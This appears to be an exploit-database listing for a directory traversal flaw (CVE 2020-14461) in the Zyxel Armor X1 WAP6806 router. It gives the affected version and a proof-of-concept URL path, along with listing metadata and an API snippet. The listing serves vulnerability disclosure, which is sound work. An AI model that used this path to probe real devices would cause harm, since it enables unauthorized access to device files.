Become a patron and gain access to the dashboard, Schedule scans, API and Search patron
Author
"Rajivarnan R"
Platform
hardware
Release date
2020-07-15
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 | # Exploit Title: Zyxel Armor X1 WAP6806 - Directory Traversal # Date: 2020-06-19 # Exploit Author: Rajivarnan R # Vendor Homepage: https://www.zyxel.com/ # Software [http://www.zyxelguard.com/WAP6806.asp] # Version: [V1.00(ABAL.6)C0] # CVE: 2020-14461 # Tested on: Linux Mint / Windows 10 # Vulnerabilities Discovered Date : 2020/06/19 [YYYY/MM/DD] # As a result of the research, one vulnerability identified. # (Directory Traversal) # Technical information is provided below step by step. # [1] - Directory Traversal Vulnerability # Vulnerable Parameter Type: GET # Vulnerable Parameter: TARGET/Zyxel/images/eaZy/] # Proof of Concepts:https://TARGET/Zyxel/images/eaZy/ <https://target/Zyxel/images/eaZy/> |
Release Date | Title | Type | Platform | Author |
---|---|---|---|---|
2020-07-15 | "Zyxel Armor X1 WAP6806 - Directory Traversal" | webapps | hardware | "Rajivarnan R" |
import requests
response = requests.get('https://www.nmmapper.com/api/v1/exploitdetails/48669/?format=json')
For full documentation follow the link above